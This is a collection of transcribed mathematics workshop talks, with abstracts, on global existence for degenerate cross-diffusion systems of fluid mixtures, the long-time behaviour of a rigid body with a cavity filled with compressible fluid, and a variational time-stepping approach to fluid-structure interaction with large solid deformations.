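\frac{d}{dt}\int_\Omega s\,dx \;=\; \int_\Omega\Big(\kappa(\theta)\,\frac{|\nabla\theta|^2}{\theta^2} \;+\; \sum_{i,j=1}^{n} M_{ij}\,\nabla q_i\cdot\nabla q_j\Big)\,dx \;\ge\; 0,
\]
which is the source of the gradient bound on the temperature and of the mixed bounds on the thermochemical potentials mentioned above.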
So what is the idea, in spite of all the difficulties? The first idea is that I express the last component of the partial densities through all the other partial densities — this is possible since the sum of everything is given by the initial data, which is known — and then I formulate the equations in terms of some kind of dual variables, which are just given here by these logarithmic expressions. The interesting thing, and this may be well known to those of you who know these Fick-Onsager approaches, is that the reduced matrix, where I remove the last row and column, is positive definite, at least for positive densities; I will come back to this point later. Because of this reformulation and of the transformation between the v_i and the rho_i, I get an L-infinity bound: I am now working with the v_i's as the main variables, and the rho_i's are just nonlinear functions of the v_i's, so once I have the solutions v_i, I can compute the rho_i's, and you see from this expression, just inverting the variable transformation, that they are bounded by the initial datum. This is the reason why we get the upper bound. What is still not clear: the matrix is positive definite for rho_i bigger than zero, but it might happen that it is equal to zero. There we do the following: we try to exploit the entropy production term coming from this term here, because it can be bounded by this expression, and this is bounded — this is something we know from the analysis. And the funny thing is that this expression, which also looks very complicated, gives a bound — some terms cancel — and this gives a bound for the gradient of the square root of the rho_i's. This gives me the gradient estimate, and by this I am overcoming the fact that the matrix M, even the reduced matrix, is only positive semi-definite, since rho_i could be zero. Okay, and then we have another difficulty: we need to define objects like the heat conductivity times the gradient of theta, and it is not so clear how to do it, since we do not have much regularity for the temperature. But luckily, taking the test function theta gives H1 estimates for theta squared, and by this we can define these products, which then lie in some nice Lebesgue space. Everything is of course combined with some approximation procedure, which here is more or less standard, and with some compactness results.
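A hedged sketch of the inversion behind the L-infinity bound; the precise form of the "logarithmic" entropy variables below is my guess at what the slide shows, so treat it as illustrative of the boundedness-by-entropy mechanism rather than as the exact formulas of the talk.
\[
v_i \;=\; \log\frac{\rho_i}{\rho_n},\quad i=1,\dots,n-1,
\qquad\Longleftrightarrow\qquad
\rho_i \;=\; \rho^{0}\,\frac{e^{v_i}}{1+\sum_{j=1}^{n-1}e^{v_j}},\qquad
\rho_n \;=\; \frac{\rho^{0}}{1+\sum_{j=1}^{n-1}e^{v_j}},
\]
so whatever values the v_i take, each partial density automatically satisfies 0 < rho_i < rho^0, where rho^0 is the total mass density fixed by the initial data.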
The second model looks easier, but it is more difficult from a mathematical viewpoint. Here I have just one species plus the energy density, and I have some very special definitions for the thermochemical potentials and a special expression for the diffusion or Onsager matrix. This is not coming out of the blue: it has been derived by Favre, Schmeiser and Pirner by considering a Boltzmann model with a kind of background temperature exchange — so the particles are not colliding, there is just an interaction because of the temperature — and in the diffusion limit they got this model. The nice feature is that there is in fact an underlying thermodynamic structure, since you can find that this is the free energy you need to consider, and when, just as a consistency check, you compute the energy density, which I have not defined here, you can see that it is given by this expression. So this model is in fact written in a maybe too complicated way, just to show you that it fits in the framework of the models I want to consider. Another formulation is this one. This looks easier, it has a kind of Laplace structure, but in fact it is quite delicate, since you have a degeneracy at theta equal to zero, which becomes clear from the Onsager matrix, and maybe you can also recognize it in this equation. So we have to treat these kinds of models. We have been able to prove also here global existence of weak solutions, with non-negative particle density and positive temperature, in some space of weak solutions. In fact the analysis was a little bit more tricky than for the first model, since we needed three ideas. The first idea is the same as before: we just write down some energy inequality, and it is this one, so we get an estimate for the gradient of the square root of the product of particle density and temperature, and then we get some information on the gradient of the logarithm of the temperature, which, by the way, gives positivity. That's nice, but it's not enough, since this kind of regularity is too low to identify these products when we pass to the limit in the approximation. So we need further estimates, and here we exploit the Laplace structure, using as test functions — basically; it's more complicated since we have no-flux boundary conditions — the inverse of the Laplacian applied to rho or to E. Then the Laplacians cancel, and what you get is an estimate: when you multiply this by rho, this is this term, and when you multiply this by E, this is this term. After some estimations you get this information, and this is a kind of higher-order integrability for your functions; in particular this gives a W^{1,1} bound for rho times theta and theta itself, which means that for the energy density you have some gradient bound, and this, together with an Aubin-Lions compactness result, gives you strong convergence for E. But now the problem is that you do not get any gradient information on rho, since — recall, let me go back — this is just gradient information on rho times theta, and if theta is equal to zero, then you lose any information. So you need to do something else, and what we did is take some tools from the mathematics of fluid dynamics and renormalize the equations. Let us assume that we have some approximate solutions rho_epsilon, theta_epsilon; then the renormalized particle density equation, or mass conservation equation, is given by this one — you use F prime of rho_epsilon as a test function, and this is your renormalized equation. The nice feature is that by this you can truncate your rho_epsilon and apply the so-called div-curl lemma, since all the estimates from before together with this truncation allow you to verify the assumptions needed for this lemma. What you get is then a little bit classical, for those who know how to do it for the compressible Navier-Stokes equations: for the weak limit of some smooth function F applied to rho_epsilon times another smooth function G applied to the approximation of the temperature, the weak limit of the product is equal to the product of the weak limits.
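Schematically, the compensated-compactness conclusion just described has the following form; the bar notation for weak limits is mine, and F, G stand for the smooth truncations used in the renormalization.
\[
\overline{F(\rho)\,G(\theta)} \;=\; \overline{F(\rho)}\;\overline{G(\theta)},
\]
where the bar denotes the weak limit of the corresponding sequence as $\varepsilon\to 0$; choosing F and G suitably then yields $\rho_\varepsilon\theta_\varepsilon \rightharpoonup \rho\,\theta$ and eventually the almost-everywhere convergence of $\rho_\varepsilon$.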
Then you need to work a little bit, so that you not only use smooth functions but specify F and G, and you can prove that the weak limit of this one here — epsilon goes to zero — is given by the product of the weak limits of rho_epsilon and theta_epsilon, which I denoted here by rho and theta. This is somehow the main tool in order to prove that eventually rho_epsilon converges almost everywhere to rho, and together with the estimates you can conclude. Okay, so these are the two models. Let me summarize how we treated the degeneracies. For the first model, we could overcome the degeneracy by using the dual entropy variables and reducing the system, together with the entropy estimate, some additional estimates for the temperature, and a method which I call the boundedness-by-entropy method, in order to get L-infinity bounds. The second model was again based on the entropy estimates, together with what you can call an H-minus-one method to get the higher-order integrability estimates, combined with renormalization techniques and div-curl compactness results. These were just two very simple examples, and one can proceed and do things more realistically from a physical viewpoint, for instance considering compressible heat-conducting mixtures. This we did with Miroslav Bulíček, Milan Pokorný and Nicola Zamponi, but only for the stationary case. Let me make some advertisement for Milan's talk on Friday at eight a.m. Banff time; he will present more results on this model. Another model, for the transient case but only with constant temperature, was considered by Dreyer, Druet, Gajewski and Guhlke some years ago, but the transient model is open. We already started to work on this, but it is really a hard problem — maybe you have some ideas. There are also some other questions: for instance, I use this degeneracy in rho_i, and you could also use some power here, but the question is whether this is really a physical assumption; it's a little bit ad hoc, maybe, while the model of Dreyer and Druet was a little bit more complicated, so it would be nice to understand this better. Moreover, the regularity is rather low, and it would be interesting to get more regularity, which is important for numerical approximations and also, maybe, with the hope of getting uniqueness of weak solutions. Okay, that's what I wanted to say. Thank you very much for your attention.
We present global-in-time existence results for two cross-diffusion systems modeling heat-conducting fluid mixtures. Both models consist of the balance equations for the mass densities and temperature. The key difficulty is the nonstandard degeneracy in the diffusion (Onsager) matrices, i.e., ellipticity is lost when the fluid density or temperature vanishes. This problem is overcome in the first model by exploiting the volume-filling property of the mixture, leading to gradient estimates for the square root of the partial densities, and in the second model by compensated compactness and renormalization techniques from mathematical fluid dynamics. The first model is joint work with C. Helmer, the second one with G. Favre, C. Schmeiser, and N. Zamponi.
10.14288/1.0398145 (DOI)
for the invitation here. It's the first time I'm in Banff and it's a marvelous place, of course. Several results will be presented in the next few minutes, and these results were obtained in collaboration with Professor Galdi, Professor Nečasová and also Bangwei She. I'm also very proud that there will be two pictures in my presentation, because usually there are no pictures in my presentations at all. Okay, so I'll talk about a body with a cavity filled with a compressible fluid, so let me switch to my first picture. So that's it — I know the resolution of this picture is not so high, but I would just like to introduce my system. The system, called S, consists of a body and a cavity, as you can see here. The body can move freely in space and contains some cavity, and the cavity is assumed to be filled with some kind of fluid. I will present several results, mainly concerning the long-time behavior of such a system. Let me start briefly with the history of this research. The study of this motion traces back to the pioneering contributions of Stokes, Zhukovsky, Poincaré and also Sobolev. Zhukovsky claimed that the motion of such a system will be stabilized after some time: it will eventually be a rigid motion, and more precisely a permanent rotation. There are many, many works, but in full generality, for the fully general system, it was shown by Disser, Galdi and their collaborators in 2016 that the Zhukovsky conjecture holds; they treat an incompressible fluid inside the body. Our aim is to look into the role of the compressibility of that fluid, so we just put a compressible fluid inside the freely moving body. Okay, so let me introduce the governing equations. The first two equations are the usual compressible Navier-Stokes equations: the first equation is the momentum equation — you can see the stress tensor contains some pressure, and the pressure is given by a barotropic law, a times r to the power gamma, where a and gamma are supposed to be positive constants; I will later show the restrictions on them — and the second equation is the continuity equation, or conservation of mass. The third equation is the boundary condition: here w is the velocity of the fluid, and on the boundary the velocity is just the rigid motion, where the rigid motion of the body is represented by this omega and this eta — omega is a rotation and eta is a translation. Next we have the equations for the rigid motion: the fourth equation is the conservation of angular momentum and the last equation is the conservation of linear momentum, so the fourth equation is an equation for omega, the rotation, and the fifth equation is an equation for the translation. Okay, maybe it's a bit unusual that here r is the density and w is the velocity; the reason for this notation is that these two unknowns live on the moving domain. We can switch to the non-moving domain — the constant-in-time domain — by a certain transformation, and we can deduce this system.
Yes, so this time the domain is fixed, which, as you can see, is more convenient. Here there are two velocity fields, velocity v and velocity u: u is the velocity of the fluid together with the rigid motion, while v is the velocity of the fluid without the rigid motion, so it is the relative velocity with respect to the body. Okay, now let me briefly mention some of our a priori estimates. We have conservation of mass and we have an energy inequality; the energy contains not only the kinetic energy of the fluid and the pressure energy of the fluid, but also the kinetic energy of the body — these are these two terms. And of course, once we have this energy estimate we are also able to deduce the existence of weak solutions by, say, the standard Feireisl-Lions theory. However, because of the boundary condition we have in mind — because the body may possess any free motion — we are also able to deduce the conservation of the modulus of the angular momentum, and this is something that will be presented here without further technical details. If I introduce the quantity called M — the tensor of inertia of the body times omega, plus the integral over the cavity of rho x cross u — then this particular quantity fulfills this ODE: the time derivative of M plus omega cross M equals zero. Of course we can multiply the equation by M in order to deduce that the magnitude of the total angular momentum of the whole system is constant. That's quite nice, because it means the system cannot tend to a stop, so the trivial solution is not the correct candidate for the long-time behavior. In order to find some candidates, let me consider the steady-state system, which of course looks like this: these are the equations without time derivatives. There is one issue, namely a non-uniqueness which might appear due to vacuum regions; this non-uniqueness was described in papers by Feireisl and Petzeltová from 1998 and 1999. This non-uniqueness is quite a bad issue, because we would like to have a unique candidate for the long-time limit — once there is a unique candidate for the long-time limit, I can say that we are done. In order to prevent this non-uniqueness, we assume that there are no vacuum regions; that will be our assumption from now on. We can then deduce several lemmas and observations. First of all, for a weak solution to the steady-state system, if there is any, it must hold that the relative motion v_s is identically equal to zero. Moreover, if there is any weak solution to the steady-state system, then we have this particular set of equations, and these equations are algebraic equations and no longer PDEs — that's quite important for us. Now I would also like to mention one existence result for the non-steady case: we are able to deduce that there exists a strong solution once the initial data are small enough. I don't want to comment on this further, but we would like to show that every strong solution constructed for small initial data converges to some long-time limit.
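Before going on, here is a hedged reconstruction in formulas of the conserved quantity just mentioned (notation mine: 𝕀 denotes the inertia tensor of the body and C the cavity):
\[
M(t) \;=\; \mathbb{I}\,\omega(t) \;+\; \int_{\mathcal C}\rho\,x\times u\,dx,
\qquad
\frac{dM}{dt} + \omega\times M = 0
\;\Longrightarrow\;
\frac{d}{dt}|M|^2 = -2\,M\cdot(\omega\times M) = 0,
\]
so the magnitude |M| is conserved along the motion and, unless it vanishes initially, the system cannot come to rest.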
Okay, so in order to show that there is just one candidate, we use the omega-limit set. Let me recall that the omega-limit set is the set of all quadruples, here denoted by v hat, omega hat, psi hat and rho hat, for which there exists an increasing unbounded sequence of times such that v converges to v hat, omega converges to omega hat, psi converges to psi hat and rho converges to rho hat. The omega-limit set is compact, connected and non-empty — these are quite standard properties. Secondly, since the density of the strong solution is bounded from below and from above, the points in the omega-limit set do not contain a vacuum region; the density is always bounded from below and from above. Moreover, the omega-limit set is invariant under the solutions constructed in the previous theorem: once there is a strong solution emanating from a point of the omega-limit set, such a solution remains in the omega-limit set. Now I am going to show that the omega-limit set consists of isolated points, because then, since the omega-limit set is connected, there is just one point — the candidate for the long-time limit. That's our aim here. Every element of the omega-limit set solves the steady-state system, and moreover we still have the conservation of mass and the conservation of the magnitude of the angular momentum, so these two equations have to be added to the steady-state system. I'll go a bit quickly through this: we end up with this set of equations, which is a system of eight equations, because the first one and the third one are each systems of three equations. So we can rewrite it as a system of eight equations in eight unknowns, for an appropriately defined nonlinear function f, as you can see here. Our goal was to show that the gradient of f is, under certain conditions, regular, because once the gradient is regular the solutions are isolated points. So let me go quickly through that. This is the gradient of f; you can see it consists of a main part and of something which, hopefully, should be negligible — it consists of some derivatives here. Once we assume that the inertia tensor of the whole system has three distinct eigenvalues and that the remaining part is small, the gradient of f is regular; this can of course only be claimed under certain conditions. So we end up with this theorem: if we have a cavity of class C4 — this is in order to have the strong existence result — and if we assume, roughly, that the three eigenvalues of the inertia tensor of the whole system are distinct, then there exists a_0 such that for all a bigger than a_0 the terminal motion of the coupled system reduces to a uniform rotation around an axis parallel to the constant angular momentum M_0 of S, passing through its center of mass G. Here I would like to comment a bit, because here we have the constant a — let me go back to my third slide, I guess; okay, the fourth slide. This constant a is the one in the definition of the pressure, and in order to obtain our main claim we need this constant a to be sufficiently high. This means that the main claim is true only for a sufficiently incompressible fluid.
Okay, so such a theorem is of course not very suitable for studying the dependence between the decay rate and the compressibility of the fluid, which was our main aim. That's why we treated another case: this time we consider a system concerning a pendulum, not a freely moving body. In our case the pendulum is a body which may move with just one degree of freedom, so it can rotate freely around one axis. You can see that, once again, the system is very similar; however, this time the rigid motion is described just by a scalar omega, and it is expressed as omega times e3 cross x, so the whole body may rotate around the e3 axis. The last two equations are the equations for the mechanical oscillator; here g is the direction of gravity. Of course, once again we have an energy estimate — you can see that the one term on the right-hand side is the potential force — and that's why, once again, we can deduce the existence of a weak solution. But when we turn our attention to the steady-state system it becomes much more interesting, because it turns out that we are able to prove some kind of uniqueness. So this is the stationary system; I would like to comment on it a bit. First of all, the (gamma minus one)-th root of this bracket — gamma minus one divided by a times gamma, times g dot x plus c — is actually the density, which is a function of g and c. Then we have this second equation: this L can be seen as the center of gravity of the whole fluid, this P is just the projection onto the first two variables, so P of this bracket is just the center of gravity of the fluid, and here you can see there is a scalar times a times some direction of gravity. And then the gravity always has the same magnitude. We can show that if some density and some direction of gravity form a minimizer of the energy functional, then these two quantities solve the above system, and we can use the direct method of the calculus of variations to show that there exists a minimizer. This means that we have existence of a solution to this system. Under certain conditions we are also able to show uniqueness — since I don't have much time I will skip these assumptions; just let me say that under certain assumptions there are at most two solutions to the steady-state system, one with D less than zero and one with D greater than zero. Let me go back: if you look at the second equation, D is the quantity which multiplies the direction of gravity, and if D is greater than zero it means that gravity points in the same direction as the vector towards the center of gravity of the whole system. So if D is greater than zero you get this particular steady state, and if D is less than zero you get, say, the upside-down steady state. Of course the second one can be ruled out somehow, for example by starting with an initial energy which does not allow reaching this upside-down steady state. And once we rule out this second steady state, we are able to claim that every renormalized weak solution tends to the single remaining steady state. That's our main theorem here.
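For concreteness, a hedged reconstruction of the steady density read off the slide; the positive part and the role of the constant c (fixed by the total mass) are my own reading of the formula.
\[
\rho_s(x) \;=\; \Big(\frac{\gamma-1}{a\,\gamma}\,\big(g\cdot x + c\big)\Big)_{+}^{\frac{1}{\gamma-1}},
\]
which is just the hydrostatic density of a barotropic fluid with pressure $p = a\rho^\gamma$ in the gravitational field g: it solves $\nabla\big(a\rho_s^\gamma\big) = \rho_s\,g$ wherever $\rho_s>0$.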
This pendulum case is much more convenient for us because we are now able to look into the problem of the decay rate and of how the decay rate of the solution depends on the compressibility of the fluid. And here comes my second picture, the second picture of this talk. You can see this is a numerical simulation. Recall that A is the constant in the pressure law: if we take A to be small, A equal to 0.1, you get the dark line, and the decay is quite fast; if A is equal to 100, that's the light line, and you can see that there is still some decay, but it's not so fast. So from this numerical simulation it follows that compressible fluids provide better decay than incompressible fluids. Okay, that was all, and I would like to thank you for your attention.
We consider a system consisting of a moving body with a cavity filled with a compressible fluid. We present several existence results; however, our main aim is to deal with the long-time behavior of the whole system.
10.14288/1.0398142 (DOI)
I want to introduce a variational approach to fluid-structure interaction. This is work which was done in collaboration with Malte Kampschulte and Sebastian Schwarzacher, who are both also from Prague. So let me just start with what I want to talk about: fluid-structure interaction. The name almost tells you everything. Fluid-structure interaction happens whenever we have two materials, one a fluid material and one a solid material, which both move and somehow influence each other's movement. For example, I took this example here from some Journal of Computational Physics, but of course there are many examples, and you can think of a fluid which is flowing next to an elastic membrane. This thing here is kind of an elastic membrane, and as the fluid flows it of course exerts forces onto this elastic membrane and it starts to move. In this example, which I just took from this Journal of Computational Physics, it goes up and down and up and down, so this elastic membrane moves quite a lot. So you can already see that there are many examples in which you have an interaction between fluids and solids, and we can also see that the solid is really moving and deforming a lot. So what you can see is that the deformation of the solid can be large, and it shouldn't be enough to say, okay, we think only of some small or rigid bodies, because here you really see an example where the deformation can be quite large. Okay, so that's what we want to consider — maybe that's the main point of the talk: we will have a fluid-structure interaction, we will have some fluid, and we have a solid which can really undergo large deformations. So let me go to the model and tell you what the key ingredients will be. We will, of course, fix everything to some fixed container, so you can think of a fixed container like this; think of this as what happens at time zero, or what I think of as a reference configuration. This gray part here is my solid part, and the solid part is best described by its deformation, which I here denote by eta, because for the solid we are mostly interested in where it is — it's not so important how fast it moves, it's really important where it is — so therefore we use this deformation. For the fluid, on the other hand, the main variable which describes what it does is not really where it is, because that's not so important for the fluid as it flows all the time; the main variable here is the velocity. So what we have is a coupling between Lagrangian and Eulerian coordinates, because our solid is really described by this deformation, which tells you where every point goes, and the fluid by its velocity. Once I have these key ingredients which describe my materials, I can set up my modeling, and for my modeling I will just take the basic physical laws, which should be satisfied. The basic physical laws are the balances of mass and momentum. For the fluid, I could of course take a lot of possibilities for the balance of mass and momentum, but I don't think about it a lot and just take the Navier-Stokes equations, which is maybe the easiest model I can think of for a fluid, and I take just a Newtonian fluid.
So I have here the inertial terms. I have here the diffusion, which I will call dissipation. I have some pressure and I have some forces, and the divergence is zero because everything is of course incompressible. And for the solid, I have of course also the balance of mass, but this is not so important. And I also have the balance of momentum, which here reads: okay, I have the inertial term, I have the divergence of some stress tensor sigma, which I will specify in a minute, what this stress tensor sigma is. So this is going to be like a modeling issue, and they should be equal to the forces. So it's also Newton's second law. It's just the balance of momentum, nothing special here. And of course, over the mutual boundary, which is the mutual boundary between the fluid and the solid, there should be some transition conditions. These transition conditions tell you really how the influence between the two materials goes on. And in our case, we take maybe the most simple transition conditions we can think of. We take the continuity of the velocity over this common boundary, which somehow in the microscopic setting means that all the atoms move at the same speed. And also, we take a continuity of traction, so it means the force over this boundary is continuous. So the first here is really the continuity of velocity, which is clear, but it's written down in this reference configuration because only there we can talk about the solid velocity. And the second here is, you already see, this is the stress tensor applied to the normal, so these are the forces. And here you just have the stress tensor stemming from the Navier-Stokes equation, pulled back again to the reference configuration. So these are the boundary terms. And now, okay, so you could say this is a complete model, but it's not, because what I'm missing here is really the stress tensor for the solid. So the stress tensor for the solid needs to encode some modeling, and we will put a little bit more complexity here into the solid, or allow the stress tensor to be a little bit more complex, particularly because I said that we want to have a look at these large deformations. Okay. We want to have large deformations. So if you want to do that, then of course, the deformation of the solid somehow specifies the boundary of the domain of definition for the fluid. So of course, the deformation of the solid cannot be arbitrary. In fact, in order to set everything up and be in the correct setting, the deformation needs to be a homeomorphism at least. So we need to choose our stress tensor rightly. In fact, from the point of view of modeling solid materials, this is not something additional we ask for, because when modeling solid materials, asking the deformations to be homeomorphisms is something really standard, or one should do this all the time. So we will of course not consider all materials. We will consider only such materials for which the stress tensor is given by two potentials. So one of them is like an energy potential and one of them is like a dissipation potential. So there are really many materials which fall into this class. And I guess a similar concept is known in fluid mechanics also, but in solid mechanics this is most often called the concept of generalized standard materials, going back here to Halphen and Nguyen. And this is a concept which gives you really a wide class of materials which you can think of.
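To fix ideas, here is a schematic transcription of the balance laws and transition conditions just described. The constants, forcing terms and exact pull-back factors are not visible in the transcript, so this is an illustrative sketch rather than the speaker's precise formulas.

```latex
% Fluid (incompressible Newtonian) on the moving fluid domain:
\partial_t v + (v\cdot\nabla)v = \operatorname{div}\sigma_f + f_f, \qquad
\sigma_f = \nu\bigl(\nabla v + \nabla v^{\top}\bigr) - p\,\mathbb{I}, \qquad
\operatorname{div} v = 0 ;
% Solid (balance of momentum), written in the reference configuration:
\partial_{tt}\eta = \operatorname{div}\sigma_s + f_s ;
% Transition conditions on the common interface, in the reference configuration:
\partial_t\eta = v\circ\eta \qquad \text{(continuity of velocity)},
\\
\sigma_s\,n = \bigl(\sigma_f\circ\eta\bigr)\,\operatorname{cof}(\nabla\eta)\,n
\qquad \text{(continuity of traction; the fluid stress is pulled back via the Piola transform).}
```

The solid stress tensor sigma_s is the object that the next part of the talk specifies through an energy potential and a dissipation potential.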
And for the talk here, I will further just think of a prototypical example for this energy and dissipation which we want to consider. So let me start with the energy here. The prototypical energy I want to consider looks like this complicated expression here. So let me just talk you a little bit through what I want to have. So the first term here is just a norm. So it tells you how far the gradient more or less is from the identity. So it's an elastic term, and here is the tensor of elastic constants. So it's actually the standard Saint Venant-Kirchhoff energy. So it really just tells me that my material actually would like to be relaxed and is really in a stress-free state once there are no forces, once the deformation gradient is really the identity mapping here, so it's really not deformed at all. We also consider two additional terms. So the first additional term I put here is the inverse of the determinant of the gradient of the deformation. So the inverse of the Jacobian of the deformation. And this is really a term which is needed and physical, because once you start considering large deformations, it never can be that you could compress a finite amount of the material to zero volume with a finite energy. This should never happen. This should always be penalized. So it's clear that any physically reasonable energy should blow up to infinity as the Jacobian of the deformation goes to zero. And here we just do it with this term. And as a last thing, I consider a regularizing term. So I add here the second gradient of the deformation to the energy, which is something which is maybe not standard and which is sometimes called second grade materials. And we do it for mathematical reasons mostly, because we need more regularity. Let me just tell you that if we have the second order term, we will know a little bit more about the deformations of finite energy. In particular, we will know that the Jacobian of any such deformation of finite energy will be bounded away from zero. So it will be positive. There will exist some positive epsilon, and we will know that this determinant will always be bigger than some epsilon. This will tell you that this term here, the first term here, will actually not blow up polynomially, but will be bounded, which is of course important. But it will also be important for us from the point of view of the analysis in many ways; we will see some examples in the talk later. Let me just note that this energy overall is non-convex. And it has to be non-convex because we added this Jacobian here. And this is something physical. So if we want to consider large deformations for the solid, we can never take a convex energy and work with a convex energy. Even this Saint Venant-Kirchhoff energy is non-convex, but okay, so this maybe could be convexified. This is maybe not the point. But the point here is that this blow-up would never be possible. Okay. So this is like the energy I have in mind. And for the dissipation potential, I think of something very simple. I take a quadratic dissipation here. But of course, I have to take it quadratic not in the deformation gradient, because that would not be physical, because there would not be independence of the observer. But I have to do it in the Cauchy-Green tensor, which I do here. But of course, the downside of it is that the dissipation potential starts to depend on the state. So we will see later why this is maybe something to highlight a little bit. So okay. So this is the modeling I want to consider.
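A schematic version of this prototypical energy and dissipation, with exponents and constants as placeholders of mine rather than values read off the slides:

```latex
E(\eta) = \int_{Q}\Bigl(
 \tfrac12\,\mathbb{C}\bigl(\nabla\eta^{\top}\nabla\eta-\mathbb{I}\bigr)
          :\bigl(\nabla\eta^{\top}\nabla\eta-\mathbb{I}\bigr)
 + \frac{1}{\bigl(\det\nabla\eta\bigr)^{a}}
 + \frac{1}{q}\,\bigl|\nabla^{2}\eta\bigr|^{q}\Bigr)\,dx,
 \qquad a>0,\ q>2,
\\
R(\eta,\dot\eta) = \int_{Q}
 \bigl|\partial_t\bigl(\nabla\eta^{\top}\nabla\eta\bigr)\bigr|^{2}\,dx
 \quad\text{(quadratic in the rate of the Cauchy--Green tensor).}
```

The three energy terms correspond to the Saint Venant-Kirchhoff part, the blow-up as the Jacobian degenerates, and the second-gradient regularization; the dissipation is frame-indifferent precisely because it is built from the rate of the Cauchy-Green tensor, which is also why it depends on the state.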
So let me just wrap up and have a look at the strong formulation of what I want to do. So I have the following system. I have here my balance of momentum for the solid. So I have here the inertial term. I have here the derivative of the energy, the derivative of the dissipation potential, the forces. I have here the classical Navier-Stokes equation. I have the divergence, which is somehow missing here. The divergence of v equal to 0. I have the transition conditions between the solid and the fluid. And I have further initial and boundary conditions on this omega. OK. So this is the system I want to consider. And what I ultimately want to do, I want to prove existence of weak solutions. At best, we are a suitable time discretization scheme. So why a time discretization scheme? Because, of course, the domain changes all the time because the solid is moving. So time discretization is somehow something which helps because we can fix the domain for a very short time. OK. So this I want to do. But I will just hit OK. But I want, in order to make things simpler, I want to consider a simpler situation. In fact, I want to, for most of the talk, I will, I will, I will, I will, I will, I will consider a situation of slow movement. So what does it mean, slow movement? It means that the movement of the solid and the fluid is so slow that these inertial terms, which are here, are not needed because they are so small, they can be neglected. So this is something which I would call in the, in the, in the physics or in the modeling of solid materials, we call all this quasi-static because it's almost static. The solid is not moving a lot. For the fluid, it's not really static because it's moving, but it's more, more steady flow. So it's like quasi-static or quasi-steady situation. And this is what I want to consider. So these two inertial terms, I drop. And this is the system that we will have a look at most of the talk. OK. So we have here a system which got parabolic, which consists now only of forces, which are here on the right-hand side, the pressure. But OK, so the pressure. And derivatives of energy and dissipation potentials. Exactly. We have here like energy, we have here dissipation potential. And this diffusion here in, in, in the fluid, I can also understand as a derivative of a dissipation potential because of, yeah, it can be understood in the very same way because it plays the same role. OK. So this is the strong system. So let me now just highlight a little bit how the weak formulation of this system looks. So if I want to design a weak formulation for this, of course, I have to take care of these transition conditions. And you would probably agree that the second transition condition here looks the most ugly. So the continuity of tractions. And it is even the most ugly because it features here the stress tensor, which is something which is the least regular thing we know from, from here because, yeah. So it would be best if we somehow could have this condition somehow disappear. And this is what we can do in the weak formulation. In fact, if we take our test functions, so let me just have a guide to your attention at first to the very end of the weak formulation. So if we take our test functions here, here phi is the test function in the solid and psi is the overall test function, which lives on the whole of omega, but in particular is also the test function for the fluid. 
So if we take them coupled on the solid part in such a way that they depend on the actual solution, then it's kind of a not too hard computation that in case everything is very smooth for such test functions, this equality of tractions comes out automatically. So let me just have a look. So I have, I will call a pair at a weak solution of this parabolic fluid structure interaction problem if it has some regularity, if they still satisfy the first coupling condition. Okay, and if a weak formulation, which actually just consists of transferring here one derivative and that's more or less this and tested by the right test function holds true. So this is the weak formulation I want to consider. And it's really just magical here that this equality of tractions need not to be considered anymore. Okay. So for this weak formulation, I want to prove that from that there exists weak solutions actually according to this week formulation. So this is the theorem. There exists a weak solution, more or less. So let me just tell you how we prove this theorem. So the proof of the theorem is based on some consecutive minimization in the spirit. So we will set up a lot of minimization problems, which are time spent, the time stepping. So sometimes this is called a time incremental minimization, and it's very much used in solid mechanics. So I just send you here and it actually goes back to the spirit of the Georgie or maybe even earlier and is minimizing movements. So let me have a look how this looks like. So I want to set up this minimization schemes, which looks like minimization or minimizing movements. So I fix a time step size here. I start with some initial data. And if I assume that there is some that I have the eta tk given from my previous step, then I construct the next time step as follows. I minimize the energy plus the dissipation needed to go plus the dissipation somehow needed to go from the last step to the step. So I have here, I minimize here the energy. I here take the dissipation potential, but I multiply this by tau. I take here another dissipation potential, which comes from the fluid. And I also add here the forces. So this is what I minimize. And I minimize it subject to eta just in a natural symbol of space, the divergence of v should be equal to zero. And there is a coupling condition on the boundary between which more or less corresponds to this Dirichlet coupling condition, like the equality of velocities we had before. So let me highlight some features of this scheme. So first of all, there is no conditions on the stresses neither here. So we didn't have it in the weak formulation. And we also don't have it in this time stepping scheme, because the equality of stresses comes out automatically from the minimization, because the energy plus dissipation is only minimal if there is really no stress over the boundary and more or less. Let me have a look that the scheme is somehow explicit implicit. So it's implicit here in the energy. This is important because it allows us to control the Jacobian and the geometry of the whole thing. It is implicit here in the v's and it's implicit in the dissipation in the somehow rate variable, which is here the velocity and here also like the discretized velocity. That is explicit in the state variables. So the state variable would be here, the formation and also for the dissipation of the fluid, the state variable would be the domain on which we live. So in fact, during the minimization, all domains are fixed. 
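The time-incremental structure is easiest to see on a toy finite-dimensional problem. The sketch below is not the authors' coupled fluid-solid scheme (which minimizes over the deformation and a solenoidal velocity with an interface constraint); it only illustrates the minimizing-movements idea of replacing a time step by a minimization of "energy plus tau-weighted dissipation from the previous state", here with a non-convex double-well energy and quadratic dissipation.

```python
import numpy as np
from scipy.optimize import minimize

# Toy non-convex "stored energy": a double well in x[0] plus a quadratic part.
def energy(x):
    return (x[0]**2 - 1.0)**2 + 0.5 * x[1]**2

# One incremental step: minimize  E(x) + |x - x_prev|^2 / (2*tau),
# i.e. energy plus tau times the quadratic dissipation of the discrete velocity.
def minimizing_movement_step(x_prev, tau):
    objective = lambda x: energy(x) + np.sum((x - x_prev)**2) / (2.0 * tau)
    return minimize(objective, x_prev, method="BFGS").x

x = np.array([0.2, 1.0])   # initial state
tau = 0.05                 # time-step size
for _ in range(200):
    x = minimizing_movement_step(x, tau)
print(x)  # approaches a critical point of the energy, here near (1, 0)
```

Because each step is a minimization rather than a discretized equation, comparing the minimizer with the previous iterate immediately yields a discrete energy inequality, which is exactly the point made next in the talk.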
The domain for the fluid is given somehow from the last step, as well as here the same holds here for the dissipation potential. And this is actually needed in order to get the right Euler Lagrange equation for the solid. This is something which has already been used and for the fluid we needed to modify this accordingly. And also let me say that we have an explicit dependence here in the coupling condition. So when we couple, we say that the velocities should be the same. In order to couple here the velocities, you also have an explicit relation here. And this is important to really get the stress balance now. So once, okay, so now I can, I mean it's standard in the calculus of variations that I can prove existence of minimizers for the scheme. This is really something very, very simple. So once I have existence of minimizers, I can start doing something with them. And the advantage of having a variational scheme is that I can deduce an energy estimate quite easily. If I compare the energy of the minimizer to say the last step and zero, which is something very like most natural thing one would come up with, I already have here an energy imbalance which is the correct one. So I have here that the energy of the current step plus the dissipation, this is all the dissipation here, is bounded by the energy of the last step plus the force times. So in order, so if I now estimate these force terms, which I can do say by, sorry, which I can do by constant qualities here in order to estimate them into this dissipation, I actually get an energy imbalance immediately. So I have here that the energy plus the total integrated over time dissipation is bound by some constant. So this is like an immediate a priori estimate and 